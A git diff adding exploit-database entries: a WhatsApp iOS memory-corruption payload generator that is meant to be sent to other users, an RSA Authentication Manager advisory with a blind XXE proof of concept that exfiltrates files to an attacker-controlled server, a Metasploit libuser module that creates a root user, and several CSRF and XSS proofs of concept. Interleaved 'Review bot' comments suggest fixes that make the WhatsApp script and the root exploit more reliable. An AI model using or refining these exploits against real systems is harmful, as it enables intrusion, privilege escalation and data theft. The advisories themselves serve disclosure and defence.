⤤⤥⤦⤧⤨⤩⤪⤫⤬⤭⤮⤯⤰⤱⤲⤳⤴⤵⤶⤷⤸⤹⤺⤻⤼⤽⤾⤿⥀⥁⥂⥃⥄⥅⥆⥇⥈⥉⥊⥋⥌⥍⥎⥏⥐⥑⥒⥓⥔⥕⥖⥗⥘⥙⥚⥛⥜⥝⥞⥟⥠⥡⥢⥣⥤⥥⥦⥧⥨⥩⥪⥫⥬⥭⥮⥯⥰⥱⥲⥳⥴⥵⥶⥷⥸⥹⥺⥻⥼⥽⥾⥿⦀⦁⦂⦃⦄⦅⦆⦇⦈⦉⦊⦋⦌⦍⦎⦏⦐⦑⦒⦓⦔⦕⦖⦗⦘⦙⦚⦛⦜⦝⦞⦟⦠⦡⦢⦣⦤⦥⦦⦧⦨⦩⦪⦫⦬⦭⦮⦯⦰⦱⦲⦳⦴⦵⦶⦷⦸⦹⦺⦻⦼⦽⦾⦿⧀⧁⧂⧃⧄⧅⧆⧇⧈⧉⧊⧋⧌⧍⧎⧏⧐⧑⧒⧓⧔⧕⧖⧗⧘⧙⧚⧛⧜⧝⧞⧟⧠⧡⧢⧣⧤⧥⧦⧧⧨⧩⧪⧫⧬⧭⧮⧯⧰⧱⧲⧳⧴⧵⧶⧷⧸⧹⧺⧻⧼⧽⧾⧿⨀⨁⨂⨃⨄⨅⨆⨇⨈⨉⨊⨋⨌⨍⨎⨏⨐⨑⨒⨓⨔⨕⨖⨗⨘⨙⨚⨛⨜⨝⨞⨟⨠⨡⨢⨣⨤⨥⨦⨧⨨⨩⨪⨫⨬⨭⨮⨯⨰⨱⨲⨳⨴⨵⨶⨷⨸⨹⨺⨻⨼⨽⨾⨿⩀⩁⩂⩃⩄⩅⩆⩇⩈⩉⩊⩋⩌⩍⩎⩏⩐⩑⩒⩓⩔⩕⩖⩗⩘⩙⩚⩛⩜⩝⩞⩟⩠⩡⩢⩣⩤⩥⩦⩧⩨⩩⩪⩫⩬⩭⩮⩯⩰⩱⩲⩳⩴⩵⩶⩷⩸⩹⩺⩻⩼⩽⩾⩿⪀⪁⪂⪃⪄⪅⪆⪇⪈⪉⪊⪋⪌⪍⪎⪏⪐⪑⪒⪓⪔⪕⪖⪗⪘⪙⪚⪛⪜⪝⪞⪟⪠⪡⪢⪣⪤⪥⪦⪧⪨⪩⪪⪫⪬⪭⪮⪯⪰⪱⪲⪳⪴⪵⪶⪷⪸⪹⪺⪻⪼⪽⪾⪿⫀⫁⫂⫃⫄⫅⫆⫇⫈⫉⫊⫋⫌⫍⫎⫏⫐⫑⫒⫓⫔⫕⫖⫗⫘⫙⫚⫛⫝̸⫝⫞⫟⫠⫡⫢⫣⫤⫥⫦⫧⫨⫩⫪⫫⫬⫭⫮⫯⫰⫱⫲⫳⫴⫵⫶⫷⫸⫹⫺⫻⫼⫽⫾⫿⬀⬁⬂⬃⬄⬅⬆⬇⬈⬉⬊⬋⬌⬍⬎⬏⬐⬑⬒⬓⬔⬕⬖⬗⬘⬙⬚⬛⬜⬝⬞⬟⬠⬡⬢⬣⬤⬥⬦⬧⬨⬩⬪⬫⬬⬭⬮⬯⬰⬱⬲⬳⬴⬵⬶⬷⬸⬹⬺⬻⬼⬽⬾⬿⭀⭁⭂⭃⭄⭅⭆⭇⭈⭉⭊⭋⭌⭍⭎⭏⭐⭑⭒⭓⭔⭕⭖⭗⭘⭙⭚⭛⭜⭝⭞⭟⭠⭡⭢⭣⭤⭥⭦⭧⭨⭩⭪⭫⭬⭭⭮⭯⭰⭱⭲⭳⭶⭷⭸⭹⭺⭻⭼⭽⭾⭿⮀⮁⮂⮃⮄⮅⮆⮇⮈⮉⮊⮋⮌⮍⮎⮏⮐⮑⮒⮓⮔⮕⮘⮙⮚⮛⮜⮝⮞⮟⮠⮡⮢⮣⮤⮥⮦⮧⮨⮩⮪⮫⮬⮭⮮⮯⮰⮱⮲⮳⮴⮵⮶⮷⮸⮹⮽⮾⮿⯀⯁⯂⯃⯄⯅⯆⯇⯈⯊⯋⯌⯍⯎⯏⯐⯑⯒⯬⯭⯮⯯ⰀⰁⰂⰃⰄⰅⰆⰇⰈⰉⰊⰋⰌⰍⰎⰏⰐⰑⰒⰓⰔⰕⰖⰗⰘⰙⰚⰛⰜⰝⰞⰟⰠⰡⰢⰣⰤⰥⰦⰧⰨⰩⰪⰫⰬⰭⰮⰰⰱⰲⰳⰴⰵⰶⰷⰸⰹⰺⰻⰼⰽⰾⰿⱀⱁⱂⱃⱄⱅⱆⱇⱈⱉⱊⱋⱌⱍⱎⱏⱐⱑⱒⱓⱔⱕⱖⱗⱘⱙⱚⱛⱜⱝⱞⱠⱡⱢⱣⱤⱥⱦⱧⱨⱩⱪⱫⱬⱭⱮⱯⱰⱱⱲⱳⱴⱵⱶⱷⱸⱹⱺ' + sutf8 = payload.encode('UTF-8') + finalPoC = payload*6 + print "[*] Writing to file: " + filename + open(filename, 'w').write("\n".join(payload)) + print "[*] Done." 
+ +def howtouse(): + print "Usage: whatsapp.py [FILENAME]" + print "[*] Mandatory arguments:" + print "[-] FILENAME" + sys.exit(-1) + +if __name__ == "__main__": + try: + print "[*] WhatsApp 2.18.31 iOS - Remote memory corruption" + print "[*] Author: jsacco@exploitpack.com - http://exploitpack.com" + print "[*] How to use: Copy the content of the file and send +it as a message to another whatsapp user or group" + whatsapp(sys.argv[1]) + except IndexError: + howtouse() \ No newline at end of file diff --git a/exploits/java/webapps/44634.txt b/exploits/java/webapps/44634.txt new file mode 100644 index 000000000..81a9a59ef --- /dev/null +++ b/exploits/java/webapps/44634.txt 
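Review bot: In `whatsapp`, the output file is written with `open(filename, 'w').write(...)` and never closed, so the flush depends on the interpreter's garbage collection; use `with open(filename, 'w') as fh: fh.write(...)`. The locals `sutf8` and `finalPoC` are assigned and never read and should be removed. `reload(sys)` plus `sys.setdefaultencoding` and the bare `print` statements make this Python 2-only code, yet the shebang is the unversioned `#!/usr/bin/env python`; use `#!/usr/bin/env python2` or state the required interpreter in the header comment.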
@@ -0,0 +1,254 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180516-0 > +======================================================================= + title: XXE & XSS vulnerabilities + product: RSA Authentication Manager + vulnerable version: 8.2.1.4.0-build1394922, < 8.3 P1 + fixed version: 8.3 P1 and later + CVE number: CVE-2018-1247 + impact: High + homepage: https://www.rsa.com + found: 2017-11-16 + by: Mantas Juskauskas (Office Vilnius) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Europe | Asia | North America + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"RSA provides more than 30,000 customers around the world with the essential +security capabilities to protect their most valuable assets from cyber +threats. With RSA's award-winning products, organizations effectively detect, +investigate, and respond to advanced attacks; confirm and manage identities; +and ultimately, reduce IP theft, fraud, and cybercrime." + +Source: https://www.rsa.com/en-us/company/about + + +Business recommendation: +------------------------ +By exploiting the vulnerabilities documented in this advisory an attacker can +obtain sensitive information from the RSA Authentication Manager file system, +initiate arbitrary TCP connections or cause DoS. In addition to this, clients +of the RSA Authentication manager can be affected by exploiting client-side +issues. + +SEC Consult recommends to apply the available patches from the vendor. 
+ + +Vulnerability overview/description: +----------------------------------- +1) XML External Entity Injection (XXE) (CVE-2018-1247) +The used XML parser is resolving XML external entities which allows an +authenticated attacker (or an attacker that is able to trick an authenticated +user into importing malicious XML files) to read files, send requests to +systems on the internal network (e.g port scanning) or cause a DoS (e.g. +billion laughs attack). +This issue has been fixed by RSA as described in the advisory DSA-2018-086. +(http://seclists.org/fulldisclosure/2018/May/18) + + +2) Cross-site Flashing +The vulnerable flash file does not filter or escape the user input +sufficiently. This leads to a reflected cross-site scripting vulnerability. +With reflected cross-site scripting, an attacker can inject arbitrary HTML or +JavaScript code into the victim's web browser. Once the victim clicks a +malicious link the attacker's code is executed in the context of the victim's +web browser. + +The vulnerability exists in a third party component called pmfso. +This issue has been fixed by RSA as described in the advisory DSA-2018-082. + + +3) DOM based Cross-site Scripting +Several client-side scripts handle user supplied data with insufficient +validation before storing it in the DOM. This issue can be exploited to cause +reflected cross-site scripting. + +The identified issues exist in third party components. One of the affected +components is PopCalendarX which has an assigned CVE (CVE-2017-9072). +This issue has been fixed by RSA as described in the advisory DSA-2018-082. + +Two further issues affecting other third party components are not yet fixed, +as the third party vendor did not supply a patch to RSA yet. + + +Proof of concept: +----------------- +1) XML External Entity Injection (XXE) (CVE-2018-1247) + +The Security Console of the RSA Authentication Manager allows authenticated +users to import SecurID Token jobs in XML format. 
By importing an XML file +with malicious XML code to the application, it is possible to exploit a blind +XXE vulnerability within the application. + +For example, in order to read arbitrary files from the RSA Authentication +Manager OS, the following malicious XML file can be imported via the affected +endpoint: +========================================================================================== +POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1 +Host: :7004 +Cookie: [snip] + +[snip] + +-----------------------------9721941626073 +Content-Disposition: form-data; name="textImportFileName.theFile"; +filename="xxe_test.xml" +Content-Type: text/xml + + +/a.dtd"> + +&e1; + +-----------------------------9721941626073 +Content-Disposition: form-data; name="textImportFileName.uploadResult" + +[snip] + +========================================================================================== + +In this case, the attacker has to host the defined a.dtd file in the web root +of a controlled web server: +========================================================================================== +# cat /var/www/a.dtd + +:8080/%p1;'>"> +%p2; +========================================================================================== + +Assuming that the RSA Authentication Manager OS has network level access to +the TCP port 80 and 8080 of the attacker controlled IP address, as soon as the +malicious XML file gets uploaded and parsed, the contents of the /etc/issue +file (as an example) are leaked to a remote listener controlled by the attacker: +========================================================================================== +# nc -nlvp 8080 +listening on [any] 8080 ... 
+connect to [] from (UNKNOWN) [] 32817 +GET /RSA%20Authentication%20Manager%208.2.1.4.0-build1394922 HTTP/1.1 +========================================================================================== + +Similarly, contents of other internal files can be obtained from the affected +system with current service user permissions. + + +2) Cross-site Flashing +The issue affects a third party component pmfso (DSA-2018-082). +To exploit a reflected cross-site scripting via the vulnerable SWF Flash file +it is sufficient to click the following URL: + +https://:7004//IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert("Cross-site_Scripting")// + + +3) DOM based Cross-site Scripting + +Example 1: +The issue affects a third party component PopCalendarX (CVE-2017-9072). +To exploit DOM based reflected cross-site scripting it is enough to trick a +victim into executing the following JavaScript (e.g. by clicking on a +specially crafted link): +========================================================================================== + + +========================================================================================== + +Example 2: +Proof of concept has been removed. The issue affects another third party +component. The fix has not been issued by the third party vendor so far. + +Example 3: +Proof of concept has been removed. The issue affects another third party +component. The fix has not been issued by the third party vendor so far. + + +Vulnerable / tested versions: +----------------------------- +The identified vulnerabilities have been verified to exist in the +RSA Authentication Manager, version 8.2.1.4.0-build1394922 which was the latest +version available during the test. + + +Vendor contact timeline: +------------------------ +2017-11-23: Contacting vendor through security_alert@emc.com +2017-11-24: Vendor confirms the information was received, forwards it + to the responsible team for investigation and assigns tickets. 
+2017-12-08: Vendor acknowledges all reported issues as valid. Remediation + plan is being determined. +2018-01-04: Contacting vendor for a status update. +2018-01-04: Vendor provides a possible fix date. +2018-02-21: Vendor provides a status update regarding the fix release date. +2018-04-24: Vendor contacts for credit text approval. +2018-05-08: Contacting vendor for the reason of uncoordinated public + release and status information +2018-05-08: Vendor provides an update regarding their public release and + status of vulnerabilities not included in the release, vendor info: + * DSA-2018-086 (http://seclists.org/fulldisclosure/2018/May/18) + was released on 5/4 + * DSA-2018-082 (https://community.rsa.com/docs/DOC-92083) + was released on 5/3 +2018-05-16: Security advisory release + + +Solution: +--------- +The vendor has released an advisory that contains recommendations of how to +resolve the reported XML External Entity Injection Vulnerability: +DSA-2018-086 - https://community.rsa.com/docs/DOC-92085 - (RSA Link Sign On Required) + +Full Disclosure archive: +http://seclists.org/fulldisclosure/2018/May/18 + +Note: the suggested resolution also provides a fix for the Cross-site Flashing +and DOM based Cross-site Scripting (only Example 1) issues provided in the +descriptions above. + + +Workaround: +----------- +None + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Europe | Asia | North America + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. 
The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Interested to work with the experts of SEC Consult? +Send us your application https://www.sec-consult.com/en/career/index.html + +Interested in improving your cyber security with the experts of SEC Consult? +Contact our local offices https://www.sec-consult.com/en/contact/index.html +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF M. Juskauskas / @2018 \ No newline at end of file diff --git a/exploits/linux/local/44633.rb b/exploits/linux/local/44633.rb new file mode 100755 index 000000000..5e3548f55 --- /dev/null +++ b/exploits/linux/local/44633.rb 
@@ -0,0 +1,275 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Libuser roothelper Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges on Red Hat based Linux + systems, including RHEL, Fedora and CentOS, by exploiting a newline + injection vulnerability in libuser and userhelper versions prior to + 0.56.13-8 and version 0.60 before 0.60-7. + + This module makes use of the roothelper.c exploit from Qualys to + insert a new user with UID=0 in /etc/passwd. + + Note, the password for the current user is required by userhelper. + + Note, on some systems, such as Fedora 11, the user entry for the + current user in /etc/passwd will become corrupted and exploitation + will fail. + + This module has been tested successfully on libuser packaged versions + 0.56.13-4.el6 on CentOS 6.0 (x86_64); + 0.56.13-5.el6 on CentOS 6.5 (x86_64); + 0.60-5.el7 on CentOS 7.1-1503 (x86_64); + 0.56.16-1.fc13 on Fedora 13 (i686); + 0.59-1.fc19 on Fedora Desktop 19 (x86_64); + 0.60-3.fc20 on Fedora Desktop 20 (x86_64); + 0.60-6.fc21 on Fedora Desktop 21 (x86_64); + 0.60-6.fc22 on Fedora Desktop 22 (x86_64); + 0.56.13-5.el6 on Red Hat 6.6 (x86_64); and + 0.60-5.el7 on Red Hat 7.0 (x86_64). + + RHEL 5 is vulnerable, however the installed version of glibc (2.5) + is missing various functions required by roothelper.c. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Qualys', # Discovery and C exploit + 'Brendan Coles' # Metasploit + ], + 'DisclosureDate' => 'Jul 24 2015', + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => + [ + [ 'AKA', 'roothelper.c' ], + [ 'EDB', '37706' ], + [ 'CVE', '2015-3245' ], + [ 'CVE', '2015-3246' ], + [ 'BID', '76021' ], + [ 'BID', '76022' ], + [ 'URL', 'http://seclists.org/oss-sec/2015/q3/185' ], + [ 'URL', 'https://access.redhat.com/articles/1537873' ] + ], + 'DefaultTarget' => 0)) + register_options [ + OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]), + OptString.new('PASSWORD', [ true, 'Password for the current user', '' ]), + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def password + datastore['PASSWORD'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + cmd_exec "chmod +x '#{path}'" + end + + def live_compile? + compile = false + + if datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True') + if has_gcc? + vprint_good 'gcc is installed' + compile = true + else + unless datastore['COMPILE'].eql? 'Auto' + fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.' + end + end + end + + compile + end + + def check + userhelper_path = '/usr/sbin/userhelper' + unless setuid? userhelper_path + vprint_error "#{userhelper_path} is not setuid" + return CheckCode::Safe + end + vprint_good "#{userhelper_path} is setuid" + + unless command_exists? 'script' + vprint_error "script is not installed. Exploitation will fail." 
+ return CheckCode::Safe + end + vprint_good 'script is installed' + + if cmd_exec('lsattr /etc/passwd').include? 'i' + vprint_error 'File /etc/passwd is immutable' + return CheckCode::Safe + end + vprint_good 'File /etc/passwd is not immutable' + + glibc_banner = cmd_exec 'ldd --version' + glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first + if glibc_version.to_s.eql? '' + vprint_error 'Could not determine the GNU C library version' + return CheckCode::Detected + end + + # roothelper.c requires functions only available since glibc 2.6+ + if glibc_version < Gem::Version.new('2.6') + vprint_error "GNU C Library version #{glibc_version} is not supported" + return CheckCode::Safe + end + vprint_good "GNU C Library version #{glibc_version} is supported" + + CheckCode::Detected + end + + def exploit + if check == CheckCode::Safe + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true' + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + executable_name = ".#{rand_text_alphanumeric rand(5..10)}" + executable_path = "#{base_dir}/#{executable_name}" + + if live_compile? + vprint_status 'Live compiling exploit on system...' + + # Upload Qualys' roothelper.c exploit: + # - https://www.exploit-db.com/exploits/37706/ + path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper.c' + fd = ::File.open path, 'rb' + c_code = fd.read fd.stat.size + fd.close + upload "#{executable_path}.c", c_code + output = cmd_exec "gcc -o #{executable_path} #{executable_path}.c" + + unless output.blank? 
+ print_error output + fail_with Failure::Unknown, "#{executable_path}.c failed to compile" + end + + cmd_exec "chmod +x #{executable_path}" + register_file_for_cleanup executable_path + else + vprint_status 'Dropping pre-compiled exploit on system...' + + # Cross-compiled with: + # - i486-linux-musl-gcc -o roothelper -static -pie roothelper.c + path = ::File.join Msf::Config.data_directory, 'exploits', 'roothelper', 'roothelper' + fd = ::File.open path, 'rb' + executable_data = fd.read fd.stat.size + fd.close + upload_and_chmodx executable_path, executable_data + end + + # Run roothelper + timeout = 180 + print_status "Launching roothelper exploit (Timeout: #{timeout})..." + output = cmd_exec "echo #{password.gsub(/'/, "\\\\'")} | #{executable_path}", nil, timeout + output.each_line { |line| vprint_status line.chomp } + + if output =~ %r{Creating a backup copy of "/etc/passwd" named "(.*)"} + register_file_for_cleanup $1 + end + + if output =~ /died in parent: .*.c:517: forkstop_userhelper/ + fail_with Failure::NoAccess, 'Incorrect password' + end + + @username = nil + + if output =~ /Exploit successful, run "su ([a-z])" to become root/ + @username = $1 + end + + if @username.blank? + fail_with Failure::Unknown, 'Something went wrong' + end + + print_good "Success! User '#{@username}' added to /etc/passwd" + + # Upload payload executable + payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}" + upload_and_chmodx payload_path, generate_payload_exe + + # Execute payload executable + vprint_status 'Executing payload...' + cmd_exec "script -c \"su - #{@username} -c #{payload_path}\" | sh & echo " + register_file_for_cleanup 'typescript' + end + + # + # Remove new user from /etc/passwd + # + def on_new_session(session) + new_user_removed = false + + if session.type.to_s.eql? 'meterpreter' + session.core.use 'stdapi' unless session.ext.aliases.include? 
'stdapi' + + # Remove new user + session.sys.process.execute '/bin/sh', "-c \"sed -i 's/^#{@username}:.*$//g' /etc/passwd\"" + + # Wait for clean up + Rex.sleep 5 + + # Check for new user in /etc/passwd + passwd_contents = session.fs.file.open('/etc/passwd').read.to_s + unless passwd_contents =~ /^#{@username}:/ + new_user_removed = true + end + elsif session.type.to_s.eql? 'shell' + # Remove new user + session.shell_command_token "sed -i 's/^#{@username}:.*$//g' /etc/passwd" + + # Check for new user in /etc/passwd + passwd_user = session.shell_command_token "grep '#{@username}:' /etc/passwd" + unless passwd_user =~ /^#{@username}:/ + new_user_removed = true + end + end + + unless new_user_removed + print_warning "Could not remove user '#{@username}' from /etc/passwd" + end + rescue => e + print_error "Error during cleanup: #{e.message}" + ensure + super + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/44628.txt b/exploits/linux/webapps/44628.txt new file mode 100644 index 000000000..28a684a5d --- /dev/null +++ b/exploits/linux/webapps/44628.txt @@ -0,0 +1,32 @@ +# Exploit Title: Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery +# Date: 2018-05-15 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/horse-market-sell-rent-portal/14174352?s_rank=1725 +# CVE: N/A +# Version: 1.5.7 +# Tested on: Kali linux + +# Details: +# Horse Market Sell & Rent Portal Script has CSRF vulnerability which attacker can change user information. + +# Exploit : + + +CSRF POC + + +
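Review bot: In `exploit`, the launch line `cmd_exec "echo #{password.gsub(/'/, "\\\\'")} | #{executable_path}"` escapes single quotes but never wraps the value in quotes, so a PASSWORD containing whitespace or shell metacharacters (`$`, `;`, `|`, backticks) is word-split or interpreted by the remote shell and the run fails with the misleading 'Incorrect password' message; use `cmd_exec "echo #{Shellwords.escape(password)} | #{executable_path}", nil, timeout` (Ruby stdlib `shellwords`) so the value reaches roothelper intact. In `check`, `cmd_exec('lsattr /etc/passwd').include? 'i'` matches any `i` in the output, including an error text such as `lsattr: command not found`, so the module reports Safe on hosts where lsattr merely fails rather than where the file is immutable; anchor the test on the attribute column, e.g. `if cmd_exec('lsattr /etc/passwd') =~ /^\S*i\S*\s+\/etc\/passwd/`. The `/died in parent: .*.c:517: forkstop_userhelper/` match hard-codes a source line number of roothelper.c, so any edit to that file silently disables the wrong-password detection; matching on `forkstop_userhelper` alone is enough.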
+ + + + + + + + +
+ + + \ No newline at end of file diff --git a/exploits/php/webapps/44624.txt b/exploits/php/webapps/44624.txt new file mode 100644 index 000000000..364f152b5 --- /dev/null +++ b/exploits/php/webapps/44624.txt @@ -0,0 +1,20 @@ +# Exploit Title: MyBB Admin Notes Plugin - CSRF +# Date: 2018-05-14 +# Author: 0xB9 +# Contact: luxorforums.com/User-0xB9 or 0xB9[at]pm.me +# Software Link: https://community.mybb.com/mods.php?action=view&pid=1106 +# Version: 1.1 +# Tested on: Ubuntu 18.04 + +# 1. Description: The plugin allows administrators to save notes and display them in a list in the ACP. The CSRF allows an attacker to remotely delete all admin notes. + +# 2. Proof of Concept: + + + + + + +# 3. Solution: +# Update to the latest release +# Patch: https://github.com/vintagedaddyo/MyBB_Plugin-adminnotes/commit/3deae701cdd89753cb6688302aee5b93a72bc58b?diff=split \ No newline at end of file diff --git a/exploits/php/webapps/44625.txt b/exploits/php/webapps/44625.txt new file mode 100644 index 000000000..dce0182d9 --- /dev/null +++ b/exploits/php/webapps/44625.txt @@ -0,0 +1,15 @@ +# Exploit Title: VirtueMart 3.1.14 - Persistent Cross-Site Scripting +# Date: 2018-02-25 +# Software Link: http://virtuemart.net/ +# Exploit Author: Mattia Furlani +# CVE: CVE-2018-7465 +# Category: webapps + +# 1. Description +# An XSS issue was discovered in VirtueMart before 3.2.14. All the textareas in the admin area of the plugin can be closed by simply adding to the value and saving the product/config. By editing back the product/config, the editor's browser will execute everything after the , leading to a possible XSS. + +# 2. Proof of Concept +Having the permissions to edit the config/products, you can simply write inside a textarea, when someone will edit it back the alert will execute on the editor's browser + +# 3. Solution: Upgrade to 3.2.14 +# http://virtuemart.net/news/489-virtuemart-3-2-14-security-release-and-enhanced-invoice-handling \ No newline at end of file 
diff --git a/exploits/php/webapps/44627.txt b/exploits/php/webapps/44627.txt new file mode 100644 index 000000000..ccac2571f --- /dev/null +++ b/exploits/php/webapps/44627.txt @@ -0,0 +1,15 @@ +# Exploit Title: Multiplayer BlackJack - Online Casino Game 2.5 - Persistent Cross-Site scripting +# Date: 2018-05-16 +# Exploit Author: L0RD +# Vendor Homepage: https://codecanyon.net/item/multiplayer-blackjack-online-casino-game/15411706?s_rank=1628 +# CVE: N/A +# Version: 2.5 + +# Description : Multiplayer BlackJack - Online Casino Game script has persistent cross site scripting that attacker +# can set malicious payload into the vulnerable parameter. + +# POC : +1) click on the "sit" button in the web page +2) Put this payload into the "name" input and set wallet number : + +3) You will get an alert box in the page . \ No newline at end of file diff --git a/exploits/php/webapps/44632.html b/exploits/php/webapps/44632.html new file mode 100644 index 000000000..edf56688c --- /dev/null +++ b/exploits/php/webapps/44632.html @@ -0,0 +1,62 @@ + + +Press submit on a page containing the following HTML snippet: +
+ + alert(1)\"> + +
+ + \ No newline at end of file diff --git a/exploits/windows/local/44630.txt b/exploits/windows/local/44630.txt new file mode 100644 index 000000000..589100534 --- /dev/null +++ b/exploits/windows/local/44630.txt 
@@ -0,0 +1,36 @@
+Windows: Token Trust SID Access Check Bypass EOP
+Platform: Windows 10 1709 (also tested current build of RS4)
+Class: Elevation of Privilege
+
+Summary: A token’s trust SID isn’t reset when setting a token after process creation allowing a user process to bypass access checks for trust labels.
+
+Description:
+
+When a protected process is created it sets the protection inside the EPROCESS structure but also adds a special trust SID to the primary token as part of SeSubProcessToken. Where the process protection is used for things such as what access rights to other processes the trust SID is used for direct access checks where a security descriptor has a process trust label. A good example is the \KnownDlls object directory which is labeled as PPL-WinTcb to prevent tampering from anything not at that protection level.
+
+This trust SID isn’t cleared during duplication so it’s possible for a non-protected process to open the token of a protected process and duplicate it with the trust SID intact. However using that token should clear the SID, or at least cap it to the maximum process protection level. However there’s a missing edge case, when setting a primary token through NtSetInformationProcess (specifically in PspAssignPrimaryToken). Therefore we can exploit this with the following from a normal non-admin process:
+
+1) Create a protected process, werfaultsecure.exe is a good candidate as it’ll run PP-WinTcb. It doesn’t have to do anything special, just be created.
+2) Open the process token (we get PROCESS_QUERY_LIMITED_INFORMATION) and duplicate it to a new primary token.
+3) Create a new suspended process which will run the exploit code with the original token.
+4) Set the protected process token using NtSetInformationProcess
+5) Resume exploit process and do something which needs to pass the trust label check.
+
+NOTE: There is also a related issue during impersonation and the call to SeTokenCanImpersonate. 
Normally the current process trust SID is checked against the impersonation token trust SID and if the process token’s is lower a flag is returned to the caller which resets the new token’s trust SID to the process one. This check occurs before the check for SeImpersonatePrivilege but _after_ the check for an anonymous token authentication ID. Therefore if you’re an admin you could craft a token with the anonymous token authentication ID (but with actual groups) and do a similar trick as with the process token to prevent the reset of the trust SID during impersonation. However I couldn’t find an obvious use for this as the trust label seems to be based on the minimum between the impersonation and process token’s trust SIDs and when impersonating over a boundary such as in RPC it looks like it gets reset to the process’ protection level. But might be worth cleaning this up as well if you’re there.
+
+Proof of Concept:
+
+I’ve provided a PoC as a C# project. It does the previous described trick to run a process which can then set the trust label on a new event object it creates (\BaseNamedObject\PPDEMO). If you run the poc with a command line parameter it will try and do the event creation but should print access denied.
+
+1) Compile the C# project. It will need to grab the NtApiDotNet from NuGet to work.
+2) Run the poc with no parameters as a normal user. It will capture the token and respawn itself to create the event.
+
+Expected Result:
+Setting the trust label returns access denied.
+
+Observed Result:
+The trust label is successfully set.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44630.zip
\ No newline at end of file
diff --git a/exploits/windows/webapps/44626.txt b/exploits/windows/webapps/44626.txt
new file mode 100644
index 000000000..8e62c33e7
--- /dev/null
+++ b/exploits/windows/webapps/44626.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Rockwell Scada System - Cross-Site Scripting
+# Date: 2018-05-16
+# Exploit Author: t4rkd3vilz
+# Vendor Homepage: https://rockwellautomation.com/
+# Software Link: http://compatibility.rockwellautomation.com/Pages/MultiProductDownload.aspx?famID=4
+# Version: 1769-L16ER-BB1B, Version 27.011 and earlier, 1769-L18ER-BB1B, Version 27.011 and earlier,
+# 1769-L18ERM-BB1B, Version 27.011 and earlier, 1769-L24ER-QB1B,
+# Version 27.011 and earlier, 1769-L24ER-QBFC1B
+# Version 27.011 and earlier, 1769-L27ERM-QBFC1B, Version 27.011 and earlier
+# 1769-L30ER Version 27.011 and earlier, 1769-L30ERM, Version 27.011 and earlier,
+# 1769-L30ER-NSE, Version 27.011 and earlier
+# 1769-L33ER Version 27.011 and earlier, 1769-L33ERM, Version 27.011 and earlier, 1769-L36ERM, Version 27.011 and earlier
+# 1769-L23E-QB1B, Version 20.018 and earlier (Discontinued June 2016), and 1769-L23E-QBFC1B, Version 20.018 and earlier
+# (Discontinued June 2016).
+# Tested on: Windows Machine and Chrome,Firefox explorer
+# CVE : CVE-2016-2279
+
+# PoC
+http://TargetIP/rokform/SysDataDetail?name=<
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 0495f8e0d..b22410737 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -5971,6 +5971,7 @@ id,file,description,date,author,type,platform,port
 44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows,
 44615,exploits/windows/dos/44615.cpp,"2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service",2018-05-11,anhkgg,dos,windows,
